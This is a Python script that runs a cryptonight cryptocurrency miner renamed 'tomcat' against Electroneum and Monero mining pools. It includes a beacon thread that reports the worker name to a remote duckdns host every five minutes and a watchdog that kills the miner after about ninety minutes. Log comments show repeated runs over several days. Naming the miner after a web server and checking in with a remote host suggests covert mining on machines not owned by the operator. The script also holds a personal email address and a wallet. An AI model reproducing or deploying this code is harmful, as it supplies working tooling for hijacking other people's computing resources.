import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:05.488149
#2018-02-17 17:33:07.362862
#2018-02-17 19:21:01.465226
#2018-02-17 21:10:05.243637
#2018-02-17 22:54:04.320475
#2018-02-18 00:39:03.697005
#2018-02-18 02:30:03.340414
#2018-02-18 04:17:04.161668
#2018-02-18 06:07:06.170146
#2018-02-18 07:57:04.484802
#2018-02-18 09:45:03.244719
#2018-02-18 11:33:02.024496
#2018-02-18 13:18:07.548581
#2018-02-18 15:08:03.641948
#2018-02-18 16:56:03.792516
#2018-02-18 18:45:04.552708
#2018-02-18 20:31:05.454115
#2018-02-18 22:16:06.375908
#2018-02-19 00:06:02.017606
#2018-02-19 01:52:01.985189
#2018-02-19 03:38:07.541828
#2018-02-19 05:23:03.623279
#2018-02-19 07:11:07.109138
#2018-02-19 08:59:06.818259
#2018-02-19 10:48:07.668143
#2018-02-19 12:36:01.332216
#2018-02-19 14:25:05.430840
#2018-02-19 16:15:10.951027
#2018-02-19 18:02:04.691052
#2018-02-19 19:49:04.367539
#2018-02-19 21:38:01.323825
#2018-02-19 23:23:06.463518
#2018-02-20 01:09:07.010637
#2018-02-20 02:58:05.100828
#2018-02-20 04:45:04.867758
#2018-02-20 06:28:07.928258
#2018-02-20 08:13:03.964417
#2018-02-20 09:58:07.805901
#2018-02-20 11:42:01.979543
#2018-02-20 13:29:07.278345
#2018-02-20 15:14:06.481112
#2018-02-20 17:01:01.898997
#2018-02-20 18:49:07.611829
#2018-02-20 20:41:06.328141
#2018-02-20 22:25:09.228570
#2018-02-21 00:06:05.874191
#2018-02-21 01:50:05.114003
#2018-02-21 03:37:03.732029
#2018-02-21 05:25:06.787749
#2018-02-21 07:12:05.496582
#2018-02-21 08:57:07.660071
#2018-02-21 10:44:03.620456
#2018-02-21 12:32:10.337250
#2018-02-21 14:20:09.694275
#2018-02-21 16:07:04.446344
#2018-02-21 17:58:08.977492
#2018-02-21 19:44:05.530433
#2018-02-21 21:33:07.153613
#2018-02-21 23:19:07.411642
#2018-02-22 01:09:02.361480
#2018-02-22 02:58:04.077974
#2018-02-22 04:44:07.098141
#2018-02-22 06:28:04.500239
#2018-02-22 08:16:04.030573
#2018-02-22 10:04:06.211300
#2018-02-22 11:48:04.371100
#2018-02-22 13:34:07.854938
#2018-02-22 15:24:08.341069
#2018-02-22 17:11:02.133262
#2018-02-22 18:58:09.778056
#2018-02-22 20:50:04.407519
#2018-02-22 22:35:06.702342
#2018-02-23 00:23:01.960162
#2018-02-23 02:11:01.788492
#2018-02-23 03:58:03.627709
#2018-02-23 05:46:01.472020
#2018-02-23 07:29:06.580455
#2018-02-23 09:34:07.363666
#2018-02-23 11:39:05.846826
#2018-02-23 13:29:08.887254
#2018-02-23 15:16:09.387234
#2018-02-23 17:04:05.319322
#2018-02-23 18:52:08.688891
#2018-02-23 20:38:08.157112
#2018-02-23 22:26:06.764158
#2018-02-24 00:13:06.433657
#2018-02-24 02:05:05.686893
#2018-02-24 03:55:08.200740
#2018-02-24 05:40:09.908249
#2018-02-24 07:29:04.288674
#2018-02-24 09:16:02.020560
#2018-02-24 11:11:04.907788
#2018-02-24 13:00:09.208562
#2018-02-24 14:48:01.817969
#2018-02-24 16:40:01.300098
#2018-02-24 18:29:06.205629
#2018-02-24 20:16:01.222199
#2018-02-24 22:07:06.536251
#2018-02-25 01:04:05.915824
#2018-02-25 03:57:05.644712
#2018-02-25 07:57:01.379650